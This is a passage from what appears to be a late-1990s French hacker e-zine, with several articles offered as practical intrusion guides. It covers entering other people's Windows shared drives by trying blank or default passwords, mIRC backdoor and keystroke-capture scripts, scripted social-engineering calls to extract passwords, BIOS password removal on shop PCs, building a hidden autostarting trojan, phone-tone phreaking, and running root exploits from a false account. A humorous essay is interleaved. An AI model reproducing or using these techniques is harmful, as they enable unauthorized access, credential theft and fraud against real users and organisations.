WORKGROUP <1E> GROUP Registered MAC Address = 44-45-53-54-00-00 C:\WINDOWS>_ ;------ Si la personne fait tourner le client microsoft avec le partage de fichiers/imprimantes active, c'est ce que vous devriez voir. Sinon, un message d'erreur peut apparaitre: "Host not found.", il y a deux causes principales a cette erreur. 1- la personne ne fait pas tourner le client microsoft ou n'est, tout simplement pas sous windows, donc c'est normal. 2- quelqu'un sur le reseau utilise le meme nom de machine que vous, changer le votre en un autre moins probable (Panneau de Configuration / Reseaux / Identification). Bon, imaginons que vous ayez du premier coup une reponse favorable de nbtstat, ce qui nous interresse c'est le Remote <20>, c'est le service de partage de fichiers, s'il n'y est pas, n'esperez pas pouvoir vous connecter sur la machine. Pour la petite information, le MAC Address (Media Access Control), c'est un chip sur les cartes ethernet qui delivre un numero d'identification unique pour la carte (qui est egalement simule par le dial-up de windows, c'est pour ca que la plupart des MAC address que vous verrez seront les memes ;)). Bon, maintenant que vous connaissez le nom du remote 20, il faut que vous l'ajoutiez au fichier lmhosts dans le repertoire de windows, si ce nom contient des espace mettez-le simplement entre guillemets (""). Ce fichier est utilise par la pile du client Wins (qui fait que le NetBios prime sur le TCP/IP) et contient la redirection des addresses ip vers des nom d'ordinateurs. Ce fichier est divise en plusieurs colones, la premiere c ontient l'addresse ip, la seconde le nom de la machine hote et la troisieme et les suivantes des directives et/ou des commentaires. Ce qui differencie le passage d'une colone a une autre c'est au mimimum un espacement. Chaque directives et chaque commentaires doit etre precede du signe #, mais ils ne nous servent a rien pour le moment. ;--- Suite de la Session DOS --- C:\WINDOWS>echo addresse_ip nom_du_remote_20>>c:\windows\lmhosts C:\WINDOWS>_ ;------ Ici, si vous n'aviez pas de fichier lmhosts existant, remplacez la redirection par un simple ">" au lieu de ">>". Bon une fois le nouveau host ajouter, il ne vous reste plus qu'a resetter le cache du netbios ;--- Suite de la Session DOS --- C:\WINDOWS>nbtstat -R Successful purge and preload of the NBT Remote Cache Name Table. C:\WINDOWS>_ ;------ Maintenant, il faut savoir quelles sont les ressources partagees sur la machine hote, pour cela, on va se servir de la commande "net", dont le parametre view permet (justement) de lister ces ressources. ;--- Suite de la Session DOS --- C:\WINDOWS>net view \\nom_du_remote_20 Shared resources at \\USERNAME Sharename Type Comment ------------------------------------------- A Disk C Disk D Disk HPDeskJet Printer The command was completed successfully. C:\WINDOWS>_ ;------ Ok, si tout c'est bien passe, vous devriez avoir quelque chose de similaire. Sinon voila toujours une petites liste des messages d'erreur les plus courant, et comment en venir a bout. Error 5: You do not currently have access to this file. La machine partage des ressources mais vous devez entrer un password pour avoir access. Pour cela il faut passer par windows (si qlq1 connait un autre moyen, merci :)), cliquez sur demarer / rechercher / ordinateur (si vous n'avez pas cette option allez downloader les powertoys sur le site de microsoft). La remplissez le nom de l'ordinateur par \\nom_du_remote_20 et cliquez rechercher. Une fois que la machine est trouvee, cliquez deux fois dessus, vous pourrez alors entrer un password reseau (les premiers a essayer sont le nom du remote 20, ou un password vide). Error 53: The computer name specified in the network path cannot be located. Ici il peut y avoir deux causes, soit vous avez mal introduit des donnees precedement (dans lmhosts par exemple, ou encore dans la commande "net view"), soit la machine que vous essayez d'atteindre n'est pas accesible (elle vient de se faire deconnecter). Error 59: An unexpected network error has occurred. (Disconnected) Ici, l'erreur et due a un probleme lors de la transmission des donnees entre vous et la machine PENDANT l'execution de la commande "net view". Error 86: The specified network password is not correct. Le password que vous venez d'entrer (via le dos), n'est pas valide. Error 3787: You must log on before performing this operation. (Find) Cette erreur reste un demi mystere, elle est due au fait que windows 95 pense, lors de votre premiere tentative d'utiliser "net view" que vous n'est pas loguer sur le reseaux. Pour ne plus avoir ce probleme durant la meme session internet, cliquez sur demarer / rechercher / ordinateur (si vous n'avez pas cette option allez downloader les powertoys sur le site de microsoft). La remplissez le nom de l'ordinateur par \\nom_du_remote_20 et cliquez rechercher. Une fois que la machine est trouvee, cliquez deux fois dessus, vous pourrez alors relance la commande "net view" sans messages d'erreurs. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -= IRC: quelques trucs =- (par Utopiste) -= Introduction =- Le RFC de IRC est un des RFC que je maitrise assez bien (je parle d'un point de vu de programmation et de script) , alors vous trouverez toujours une rubrique de IRC dans ce emag, si vous des questions, n'hesitez pas a me les envoyer. Je vous donne seulement 4 truc dans cet article la, il sont un peu newbie, mais pour le premier numero de FrHack je ne voulait pas rentrer trop dans les details. 1.0 -= Comment transformer un DCC CHAT en telnet =- Il a deja quelque temps, je chattais sur IRC avec mon telnet, lorsque un ami decida de m'envoyer un DCC CHAT avec son MIRC. evidement son DCC n'a jamais fonctionner, mais il m'a donner l'idee d'utiliser le systeme de DCC de mirc pour le modifier en telnet la ligne de commande est la suivante (a taper dans mirc) //Quote privmsg nick :DCC CHAT CHAT $longip(xxx.xxx.xxx.xxx) port ou encore //Quote privmsg nick : $+ $chr(1) $+ $longip(xxx.xxx.xxx.xxx) port explication: nick = la personne qui va recevoir le DCC ou la session,  = le caractere ascii 1, $longip = une fonction prefini de MIRC qui tranforme une IP de format xxx.xxx.xxx.xxx sous un format de ip longue, xxx.xxx.xxx.xxx = l'ip ou vous desirez vous connecter et finallement, port = le port sur lequel vous desirez vous connecter. donc : //Quote privmsg $me :DCC CHAT CHAT $longip(206.231.198.66) 25 vous ferai une session DCC CHAT qui serait connecter sur le deamon mail du serveur www.collanaud.qc.ca Une petite note interessante: il est simple de detourner un DCC CHAT en programmant une remote simple ctcp 1:DCC CHAT: { //Quote privmsg %nick : $+ $chr(1) $+ $$1- } ce petit remote, fera que lorsque vous receverez une demande de DCC CHAT, elle sera automatiquement envoyer a %nick et c'Est elle qui fera le DCC CHAT, la personne qui a demander le DCC CHAT ne verra aucune difference et croira qu'elle parle a vous alors qu'en realite elle parlera a l'autre ;) la personne qui devait en temps normal recevoir le dcc va seulement voir que son DCC chat ne marche pas :) 2.0 -= Une petite back door dans le remote =- le remote est un petit interpreteur de commande qui permet de reconnaitre des evenement et de creer plus ou moins des macro a l'interieur de MIRC. Voici une petite back door mirc qui permet de controler entierement un autre mirc en lui transmettant des commandes ; installer cet instruction dans l'ordi que vous desirez controler CTCP 1:REMOTE: /$$2- cet ligne une fois installer vous permettra de pouvoir executer n'importe quel commande sur le MIRC ou elle est implante vous n'avez seulement qu'a faire /ctcp REMOTE donc par exemple vous pourrez faire: /ctcp Un_Con REMOTE op Votre_Nick (ce qui va oper l'utilisateur Votre_Nick sur le channel ou les gars est op) ou encore mieu: /ctcp Un_op REMOTE msg X ADDUSER #channel_du_op Votre_nick *!*@* 100 PassWord (ce qui va vous donner un access sur le bot X du gars si il a un access) Bon je suis sur que d'un coup la back door installer vous aurez plein d' idee ;) le problème de cet back door est que si l'utilisateur va voir dans son status il vera les [votre_nick REMOTE] /....... pour eviter ceci vous mettra la couleur de ses CTCP la meme couleur que son fond). Il existe un script legerement plus long, mais ca iras pour le prochain article de irc. 3.0 Comment faire planter IRC Un petit buffer overflow dans MIRC (ce qui provoque trois fatal error de suite) j'ai encore trouver aucune utilite autres que de l'envoyer par remote (le truc en haut) (Le quit sera celui d'un read error) //echo $str(X,333333333) $+ $str(X,333333333) Je suis sur que ce renseignement est inutiles mais ca peut toujours etre sympa a inclure dans un script (Si vous trouver une utilite quelconque, n'hesitez pas en m'en faire part) 4.0 Comment sniffer une conversation sur MIRC Bon le dernier petit truc pour cet article, comment sniffer une conversation MIRC, la encore il faut installer un petit script sur l'ordi du gars (mais ce n'est pas toujours un gros probleme). Avant de dire comment faire, n'oublier pas que notre vie publique est deja assez menacer, alors vous etes pas obliger de lire en details les conversations des autres utilisateurs, contentez vous seulement des /msg x@channels.undernet.org LOGIN #CHANNEL MotDePasse (ce qui est suffisant pour faire un TO) mais bon vous pouvez souvent chopper d'autre mot de passe ou des infos interessantes autres que ASV et les mensuration de la fille. ; parti a inclure dans le remote du gars on 1:INPUT:*: /msg Votre_nick $$1 cet fonction enverra a Un_Nick tout les phrases ou les commandes taper dans n'importe quel fenetre de MIRC -= Conclusion =- J'espere que mon article va vous etes d'une quelconque utilite, si vous avez des questions n'hesitez pas a me les envoyiez, je tacherai de repondre a ses email a l'interieur de cet chronique. -= A venir =- dans le prochain mag: une autre backdoor, la programmation des socket avec MIRC, comment se connecter a IRC via un programme de telnet. -= Utopiste =- (utopiste@hotmail.com) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=- * Le social Engeenering * (Brain Override) Le social enginnering: Cette méthode, pas trés employ‚e en France, est pourtant de loin celle permet d'infiltrer le plus de systŠmes (et en particulier de gros systèmes).. En effet il permet d'exploiter la faille la plus grosse de toute entreprise ou systŠme informatique : LE PERSONNEL ! Le social Engeenering est plus simplement l'art d'usurper l'identit‚ d'autrui, l'action de se faire passer pour une personne que l'on est pas (Je r‚pŠte pour ceux qui seraient longs … la d‚tente;) afin d'obtenir des informations confidentielles (sinon ca sert a rien ..on demande une brochure publicitaire...). Alors d'abord il y a deux m‚thodes : Soit on connait d‚ja pas mal de trucs sur la boite... Soit on connais strictement rien tou trŠs peu et on veut en apprendre d'avantage. Bon essayer d'abord de suivre ces quelques rŠgles de base: Si vous avez d‚ja fait des jeux de r“les ca peut beacoup vous aider (improvisation, facilit‚ d'adaptation du language) Pr‚parez une feuille que vous garderez sous les yeux afin de rester coh‚rent qui mensionne pr‚cis‚ment qui vous ˆtes, votre soci‚t‚ (fictive ou pas), et ou vous pr‚parez le sc‚nario de votre conversation en essayant de pr‚voir les ‚ventuelles questions que votre interlocuteur vous posera, ainsi que les r‚ponses que vous devrez lui fournir.. Bon c'est pas grand chose mais ca aide beaucoup :) Essayer aussi de pr‚voir du bruit d'ambiance du style salle informatique, standard, bureau d'‚tude etc... et quelques petites musiques que vous balancerez directement … travers votre t‚l‚phone (musiques d'attente etc...) DerniŠre chose la base du social engeenering est que : Quand vous utilisez des phrases assez concises en employant un vocabulaire trŠs technique (les acronymes ca aide..et si je retrouve mon fichier d'Acro je vous l'envoie), La personne … l'autre bout du fil va trŠs vite se trouver en situation d'inf‚riorit‚, et donc aura tendance … accepter comme vrai ce que vous lui dite ! (Bases de psycho).. Il existe aussi une autre variante qui s'appelle le reverse E. J'en reparlerais tout … l'heure. Commen‡ons par... Le second cas (La logique est une vertue du hacker :)). Le mieux dans ce cas est de se faire passer pour des personnages du genre : Un acheteur potentiel Un sondage ou une enquˆte statistique Un magazine Radio ..… la limite.. Dans ces cas l… votre but sera d'obtenir assez d'informations sur l'entreprise afin de passer … la premiŠre m‚thode. Un exemple typique : S. Soci‚t‚ Datronic, bonjour, GisŠle Dubois. V. Boujour, Jos‚e Lespare de Pc-Expert. Je suis charg‚ d'une enquˆte visant a l'‚valuation du parc informatique francais et de son ‚quipement logiciel pour le Laboratoire Ziff-Davis France. S. Heu..Oui je vais voir si... V. J'aimerai vous posez quelques questions du type "Les architectures install‚s" ou bien les "Os Utilis‚" Vous pouvez m'aidez ? S. Attendez un instant je vais voir si je peux vous passer le Service informatique. V. Je Je vous remercie vous ˆtes charmante S. De rien je vous en prie (Enfin quelqu'un qui lui a dit dans l'ann‚e) Voil… je vous passe Olivier Dotrini, du service informatique. V. Je vous remercie encore, bonne journ‚e. S. Olivier Dotrini, bonjour V. Boujour, Jos‚e Lespare de Pc-Expert. Je suis charg‚ d'une enquˆte visant a l'‚valuation du parc informatique francais et de son ‚quipement logiciel pour le Laboratoire Ziff-Davis France. S. Oui que puis je faire pour vous ? V. Eh bien nous essayons d'‚valuer la r‚partion des OS et des diff‚rents mat‚riels dans les entreprises francaises. C'est pour ca que j'aimerai vous posez quelques questions. Pouvez vous me dire le type de machines install‚s dans l'entreprise ansi que les diff‚rents type de systŠmes d'exploitation utis‚s ? S. (Passons sur la r‚ponse ou notre ami nous d‚crit en quelques mots plus ou moins long ca varie du tout ou rien le parc informatique contenant X serveurs etc..etc...) V. Et bien je vous remercie vivement d'avoir r‚pondu … mes questions? Pouvez vous ‚ventuellement me dire si et quand je pourrai vous recontacter pour de plus amples informations ? S. Oui aucun problŠme Je suis la le Lundi le mardi et le jeudi. sinon vous pouvez demander Fabrice Boudier qui sera en mesure de vous renseigner. V. Et bien merci beaucoup et peut ˆtre a bientot. Au revoir. Voila qui nous aura permis de d'abord connaitre du personel de l'entreprise ainsi qu'un peu mieux le systŠme que l'on souhaite attaquer ! :)) Vous pouvez aussi d'abord envoyer un mail en usurpant une identit‚ qui annoncera votre appel ainsi que le motif, ca ne donnera que plus de cr‚dit Maintenant il faut passer … la suite. Ben la suite, c'est trŠs simple :))) Vous allez tout simplement appeller quand Mr Dotrini n'est pas la et carr‚ment demander a parler a Mr Boudier ;)) Et la libre … votre imagination : vous faire passer pour un ami ou un contact important de Mr Dotrini : Mr Dotrini m'a dit que.. Olivier m'a demander de etc... Facile non ? AprŠs libre a vous d'improviser ! Ce texte extrait et revu du CHG (Cyber Hack Guide par Brain Override) comporte normalement une trŠs vaste bibliothŠque d'exemples et d'identit‚s d‚taill‚s), mais j'ai choisit de ne mettre ici que le plus important, le fond. La forme est affaire d'improvisation Et si vous avez l'ƒme d'un hacker, vous trouverez tout seul la suite...Il existe une l‚gŠre variante du social E. il s'agit de Reverse E. Le principe est pratiquement le mˆme, sauf que l… on se place (croit-il ;)) en situation d'inf‚riorit‚ : Du style : Salut c'est Herv‚ le stagiaire du niveau 2, Je vous appelle parce que j'ai un problŠme.. Vous vous y connaissez en informatique ? - A coup sur la personne sera fiŠre de montrer son immense savoir ainsi que... sa b‚tise ! Continuez ainsi : Alors voil…, Quand j'allume l'ordinateur, il me demande un login (prononcer LOGAIN, comme ca vous aurez vraiment l'air stupide, vous ‚pellerez le mot si n‚cessaire..) Alors je tape le mot qu'on m'a donn‚ ROSS Puis aprŠs il me demande un password et la je tape l'autre mot qu'on m'a donn‚ HERV01, et puis ‡a marche pas...etc..etc... Eh bien 6 fois sur 10 Ce cancrelas vous balancera son login + mot de passe tout en se vantant de ses comp‚tences en informatique... N'oubliez pas de le remercier d'un air stupide...Merci je ne sais pas ce que j'aurai fait sans vous.. N'h‚sitez pas … utiliser un truqueur de voix pour vous faire passer pour une femme....tous les coups sont permis.. Bon voil… un bon d‚but pour vous lancer dans le S.E. je suis sur que vous d‚velopperez rapidement vos propres techniques... A Bient“t sur le net. Brain Override Brain_override@yahoo.com ICQ 8951363 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-==-=- Bon, on va prendre une petite pause, et lire un petit texte écrit par vaToO -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-==-=- "Le monde des Zels" est un monde decale remplit de personnes (les zeliens)ayant comme seule occupation de passer de bons moments sans se prendre la tete,sans se preoccuper des innombrables conneries de la vie. Ce texte leur est dedie. L'INTELLIGENCE A LA PORTEE DU CON (ne concerne que le con) 90% des gens sont cons, vous avez donc vos chances.Gardez-les mais ne les ruinez pas. Etre con est salutaire.Avoir l'air con est rhedibitoire.Soyez assez intelligents pour saisir la nuance. Premier exercice . Comment ne plus avoir l'air con. a) Le con parle pour ne rien dire. Ne dites rien.Vous ne direz rien d'intelligent, mais ca vous empechera de dire des conneries.Vous y gagnerez. Au lieu de dire: "Quel con !", votre interlocuteur se dira:"Joue-t-il au con?"C'est un premier point. b) Si vous avez vraiment envie de parler,ne vous retenez pas.Dites vos conneries, et concluez:"Bon,j'arrete de deconner".Votre interlocuteur se dira:"II joue au con". C'est un deuxieme point. Deuxieme exercice: comment avoir l' air intelligent. Vous avez a votre disposition une serie de mimiques qui donnent inevitablement l'air intelligent. Soyez assez cons pour les copier sans complexes. a) L'air detendu: reperez la personne intelligente. Si vous etes dans un groupe de dix, il y a neuf cons, dont vous. La personne intelligente c'est celle qui semble bizarre. Des qu'elle dit quelque chose de bizarre, faites comme si vous compreniez. Meme Si vous ne comprenez rien, les autres auront l'air plus con que vous. b) L'air penetrant:pensez tres fort aux contraventions, aux impots, a votre bagnole emboutie. N'en parlez surtout pas ca ferait con.Mais pensez-y.Si vous etes vraiment tres con, ca ne vous donnera pas l 'air intelligent. Mais l 'air emmerde fait toujours bien quand on ne donne pas ses raisons. c) L'air penetre: meme exercice que le precedent mais avec un compas dans le cul. Avantage: donne une dimension souffreteuse. Vous avez aussi a votre disposition une serie d'attitudes. a) Le penseur de Rodin: asseyez-vous. Mettez votre poing ferme sous votre menton et regardez dans le vide.C'est radical.Meme si vous ne pensez a rien(ce qui est normal pour un con), il se trouvera toujours un aute con pour vous dire"A quoi penses-tu?" b) L'air du type qui n'en pense pas moins: on developpe devant vous une theorie saisissante. Vous n'y comprenez rien. Reportez-vous au petit a): l'air detendu. Pour corser, ayez l'air non seulement de comprendre, mais aussi d'avoir votre idee pas con la-dessus. Appliquez le petit b): l'air penetrant. c) Le rictus de connivence: hochez un peu la tete de bas en haut. Appliquez l'air penetre (le compas vous aide a crisper finement les maxillaires). Mefiez-vous des revelateurs involontaires de votre connerie ! a) Surveillez votre regard. Votre oeil vide et sans vie vous trahit.Par definition, vous etes trop con pour avoir la pupille petillante. Ne vous laissez pas abattre. Gardez l' oeil fixe. b) Fermez bien votre bouche. Rien ne fait plus con qu'une bouche entrouverte.Maitrisez-vous: ne machez plus de chewing gum. Si vous etes trop con pour executer en meme temps les exercices oeil fixe-bouche close, utilisez le truc de la clope: tirez sur votre megot et fixez la fumee. Troisieme exercice: Comment passer pour quelqu'un d'intelligent: a) Ne perdez pas votre temps a lire des livres intelligent et a voir des films penses..vous n'y comprendrez rien et ca vous deprimerait.Lisez plutot des critiques intelligentes. Apprenez-les par coeur et changez quelques mots. Exemple: "Ce film a la beaute desertique d'une douleur sans fin " devient " Ce film a la beaute squelettique d'une couleur sans teint". Vous ne plagiez pas vraiment et vous gagnez en hermetisme. L'hermetisme est le secret de ce troisieme exercice. Quand vous dites des conneries, dites des connenes incomprehensibles. Les cons les prendront pour des finesses qu'ils ne comprennent pas et, double avantage, les gens intelligents se sentiront cons. b) Ne faites jamais de citations. Ca fait tres con. Appropriez-vous les carrement. Mais attention, ne faites pas le con ! N'utilisez pas des citations trop connues. Si un autre con vous dit: "C'est de toi ca? ", ne prenez pas l'air confus.Ne doutez pas de vous. Votre connerie native vous y aidera. Voila maintenant vous passez a peu de frais pour quelqu'un d' intelligent. Mefiez-vous!Des gens intelligents vont venir vous poser des questions intelligentes. Vous etes trop con pour y repondre. Comment faire ? Renvoyez la balle: "Pourquoi me poses-tu cette question ? ". Quand vous ne pouvez plus la renvoyer, affrontez l'adversaire. Utilisez les quelques celebres formules qui repondront pour vous; par ordre chronologique: -Tu vois ce que je veux dire... (la formule qui sauve) -Il me semble que tu limites le probleme... (l'autre a l'air con) -Tu crois vraiment ce que tu dis ? (l'autre a l'air hypocrite) -C'est tout ce que tu trouves a dire, ben merde ! (l'autre a l'air limite) -Tais-toi tu m'atterres (l'autre a l'air tres con). S'il se tait, vous avez gagne. Ultime traquenard: la tentation de l'intelligence veritable. Attention!Ne tombez pas dans ce panneau demoniaque ! Les gens intelligents sont malheureux. Ils ont compris qu'on etait la pour vieillir et crever. Avant, il n'y a rien, apres non plus, et pendant, on en chie.Comprendre, c'est perdre les avantages du con.C'est connaitre le doute, la solitude, la marginalite odieuse, l'insomnie, l'angoisse, les battements de coeur, la souffrance. Et tout ca pour rien puisque vous serez toujours un con. Surtout, ne changez pas. Soyez assez intelligents pour rester cons. Et longue vie. _______ \(EOF)/ ___ ___ øøøøø )(() )( ) ( )() ( ))( le savoir mene a la ) ((_)) ( ) liberte )_) ( ( (_( )( )_) _ ) ___ ____ ___ ___ (__)( ) ( ) ( _ ) (____) ( ) ( ) (__) \(_)/ )(-)( )( )O( )O( )__( )_( (_) (_) (__) (___) (___) (____) [ vatoo75@altern.org ] o(____)o øoøoøoø(Mai 1998) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -= Comment By-passer la protection du mot de passe d'un Bios sur un PC =- Par {Viking} La je vais parler du cas ou vous avez access a l'ordinateur, que vous pouvez vous cacher pour une petite decapitation en vitesse et ou vous etes avant que l'ordi soit totalement ouvert (en train de booter, pis y vous fo un pass de BIOS). Compris? Les autres vous pouvez sacr‚ le camp... Bom premierement, verifiez deux ou trois passwrd, au cas ou... Si ca marche pas, bin ouvrez la carcasse de l'ordi (Tournevis ou bar a clou) pis vous chercher une petite patente (batterie) ronde sur le cote de la mother board ou ya le processeur. Enlevez ca, (pas le processeur, la patente ronde!) pis garder ca ailleurs que sur l'ordi pendant 15-30 minutes... Ensuite, regarder pour le jumper du CMOS, mettez le a off. Ensuite chercher une petite batterie blue avec un jumper colle dessus enlevez la pour 15-30 minutes aussi... Replacez le couvercle, pis allez dans le setup du BIOS, voila, metter le setup que vous voulez. Si vous etes assez rapides (du genre po mal rapide) vous allez pouvoir craquer des ti-Pc dans le magazins... Pi si le gars du rayon informatique vient vous voir bin, inventez une histoire. mweheheh faites vous pas pogner, c dur d'expliquer qu'est-ce qu'on fait avec un tournevis a quate patte dans une allee du Club Price en train de demonter un Pc. Bon, avec ca vous devriez etre pas pire pour pogne des accounts internet gratos chez tout les merveilleux (merdeux) comptoirs de Aventure Electronique. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= LES TAUPES (ou cheval de troie) I. kesk'une taupes ? Une taupe est un programmes un peu partikulier,il faut ke ce soit la personne ke vous comptez pirater ki le lance dans sa machine, pour cela un seul moyen: le social engineering , il faut mettre le gars en confiance afin k'il lance le prog. apres l'avoir lancé se prog transformera sa machine en serveur ftp accessible a tous! II. Komman faire une taupe? Il existe deja de nombreuse taupes (nukepatch, CES etc.), une taupe fait ceci: - elle transforme une machine en serveur FTP - elle donne acces à un port - elle se lance à chaque démarrage - elle reste invisible il est tres facile de faire une taupes en visual Basic (regardez aide->reseau), ensuite vous la couplez avec un prog de ftp (NE PAS OUBLIER L'ACCES AU PORT). Il suffit apres ça de creer un executable ki fera ceci: -intaller la taupe -fera kroire kelke chose a l'utilisateur (genre: uptdating reussi etc.) -editera le fichier win.ini pour lancer le prog au demarrage (load="nomduprog" /h). III. et apres ? Ben d'apres vous? voua avez plus qu'a entrer dans cette machine et ce kuand vous le voulez !!! BY -=[MAJSETIX]=- '98 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= //////=-||PHREAKING||-=\\\\\\ 鎎ŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽ¨ ü Par CyberRider de DSK CREW ü ·ŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽë \\\\\\\\\\\=========////////// Ok Pour se premier tutorial je ne rentrai pas en detaille sur la construction de box ( blue red silver etc...) bon pour ceux qui ne savent rien de ce qu'est une box sa vient un peu plus loin dans l'article d ack bon commencon First pour commencer le phreaking est totallement illegale a 100% il consiste Crosser les compagni de telephone comme bell par example mais je ne croit pas que kekun a deja ete arretter pour sa ou bin faut etre po habile. petit con- seille pour les debutant ne faite jamais sonner des tone de 1$ 25 c et encor moin le 2600 hz ce sont des tone retrassable par les compagni de telephone. Ok pour vrai maintenant quesqu une box et des tone et hz c koi staffaire la Bon les tone sont les son que utilise les telephone publique pour reconnaitre le cash et les pitton tse les beep dans le telephone spo juste pour cute quand vous caller vos pote au non c loin de laitre. Bon maintenant les tone c'est des differente pussante de hz ( des home comme sa se pronnonce tout Simplement ). Ok et maintetaNT C c koi une merde de BOX . ok c loin d etres de la merde moi je dit hehehe. Les boxe son comme des tone generateur que le monde se construise pour pour generer les tone souvant avec des vieux clavier de telephone et des circuit electronique des led et des diod des chose comme sa la mais dans se premier tutorial je ne vous montrer pas comment monter une box. voici les different type de box Blue box - genere les appele locaux (le cout dses appelle) Purple box - Tous appele gratuite Silver box - applle gratuit et bien d autre (certain dise que l arme sen sair) Cheese box - Fait de votre appele une appele intracable Bien d autre box exist comme la red box avec son spt spt2 2600 hz et autre et encor d autre fait par des personne comme la jolly box bon mais je ne rentre pas dans les detaille. Ok maintenant vous savez tous se quai le phreak vous voulez biensur commencer a phreaker domage se seras dans le prochin numero non stuen joke ok. Bon sur koi on pourrai bien s attacker bon pour commencer fau se trouver les outils moi je dit. Alors ou sen denicher vu qu on na po de box voici se qu'il nous faut - Mini enregistreuse - un ordi avec carte son - Un tone generateur facillement trouvable - Une boite telephonique cacher des yeux des gens Ok voici que sacheve se tutorial que le peu nommer d aproche au phreaking. Apres vous etes denicher un tone generateur faites vous des petit montage de styel a avoir les principal comme les tone de la blue box. Et maintenant rendez vous a votre telephone publique et faite absolument N importe koi vraiment n importe koi avec vos tone mais rester po la plus de 2 min si vous faite nimporte koi car un operateur telephonique ne doit etre fou quand i voie un telephoen qui envoi 6 fois 2600hz de suite hum po normal hein pis en passant vu que vous avez pas apris de crosse encors vous pouvez utiliser le 2600 hz pour le retour de la monnaie ok maintenant je ne suis en aucun cas resp"nsable dde se que vous allez faire je ne fait que montrer que tous est possible et non pratiquer sa a longeur de journee.. Pour toutes question ou commentaire un petit mail sufi http://dsk.home.ml.org ü Article ecrit par: CyberRider un momment donne en 1998 Dans une place de fou!!! -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - = LES EXPLOITS =- (par protek) 1) Introduction: Beaucoup de personnes me demandent ce que sont les exploits, a quoi ils servent, et comment les utiliser. Voila, j'ecris ce texte pour vous expliquer tout ca pour la derniere fois j'espere. Ca commencait a m'enerver, tout le monde sur IRC me posait des questions, c'est pour ca que moi, |Pr0teK|, ecrivain paresseux, j'ai decider de bouger mon cul une fois encore! Voila tout est la: 2) Qu'est ce qu'un "exploit" ? Bon je vais vous expliquer ca simplement, un exploit est un programme qui exploite un bogue dans des logiciels specifiques. Tous ces exploits sont different, ils font des choses differentes et exploitent des bogues differents ,c'est pour ca que les exploits sont toujours lies a des programmes differents. Les exploits sont fait pour gagner le "root" sur les systemes d'exploitations. Ils marchent quand le programme utilise le "root". Sous les sytemes UNIX , les programmes utilisent souvent le "root" pour faire une tache specifique qui ne peux etre faite par un utilisateur normal. Bon les exploits crashent le programmes jusqu'a ce qu'ils obtiennent le "root" access. 3) Comment utiliser des exploits ? 99% des exploits sont codes en "C", vous avez besoin d'un compte sur le systeme que vous voulez hacker pour utiliser un exploit. Vous avez besoin de mettre votre exloit dans votre repertoire sur le serveur. . (utilisez un compte hacker et non le votre!) Pour mettre l'exploit sur votre compte vous pouvez utiliser le port 21 (FTP), et mettre l'exploit dans votre reperoire, ou alors Telnet. Une fois que l'exploit est dans votre repertoire vous devez le compiler. La commande devrait etre: blah:~/$gcc exploit.c Ca devrait compiler votre exploit. N'oubliez pas que certains exploits contiennent des bogues et qu'il serait preferable pour vous de connaitre votre "C". Apres avoir compiler l'exploit, vous serez capable de l'executer et si vous avez bien travaillez le "root" vous aurez. Mais, tous ces exploits ne sont pas les meme et ils necessitent des commandes differentes pour marcher. 4) Ou pouvez vous trouver des exploits ? Le meilleur site: http://www.rootshell.com 5)Conclusion Et bien, ce texte devrait expliquer tout ce que vous devriez connaitre sur les exploits. Si vous pensez qu'il manque quelque chose: pr0tek@hotmail.com -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -= L'art de trouver des serveurs de les mapers. (theorie)=- (par Binf_) Chui bien fiere de collaborer a ce premier numero de FrHACK ,et je lui souhaite longue vie. Bon hum par ou commencer. La technique que je vais vous montrer ou vous expliquer en pronfondeur tout dependant de ui vous etes est simple.Et je crois que ce la base pour Tout les Hackers ou tout ceux qui veulent s'aseillier. En passant ya personne qui est nee elite..Du moins je pense. Dans mon cas j'ai commencer dans les temps des bbs :) hehehe c'etais kool.. des fois je voyais des choses sur les /passwd pis des crack .. mais moi jme trouvais elite avec mon 14.4 pis mes warez heheeh les temps ont bien changer :) J'ai commencer a hacker un peux avec l'exploit phf un clasique du hack...commancer a l'apprendre parcoeur mais l'utiliserpas sur un serveur a mon que vous aimer ca etre logger pis avoir le msg phf_cgi.abuse.html :). Mais les temps ont passer..et j'ai modifier ma facons de penser et de hacker..je hackais avec windows 3.1..hum j'etais vraiment out of date.. j'ai commencer a me tenir dans des channels comme #hack ,#hackerz ect... pis j'ai demander des questions lame je passsais pour un lamer :) .Puis chui tomber sur des bonnes personnes qui m'ont aider..faut dire qu'en meme temps que je commencais a hacker j'ecrivais des virus en assembleur mais bon ce du passer.. alors on m'a suggerer d'installer linux je hackais pis je conessais meme pas linux..peux apres j'ai installer linux puis jme suis acharner 4 mois a le mettre up. **(en passant ce pas parceque ta linux que te bon mais ca aide a comprendre)** Puis jme documentais...ce sur je catchais rien mais a force de lire 400 fois le meme termes je catchais..Une chance que je parlais anglais. Bon breff linux up je commence a me hacker moi meme. Avec du temps j'ai compris..alors j'ai mi ma box up sur internet j'ai commencer a utiliser les nouvelles commandes qui etais a ma dispositions et a les exploiters. Mais il y avais qqch qui me manquais..pour trouver des serveurs.. comment faire..! Il y as le web..ou la luck..ou les freeshell ou <> les maps de 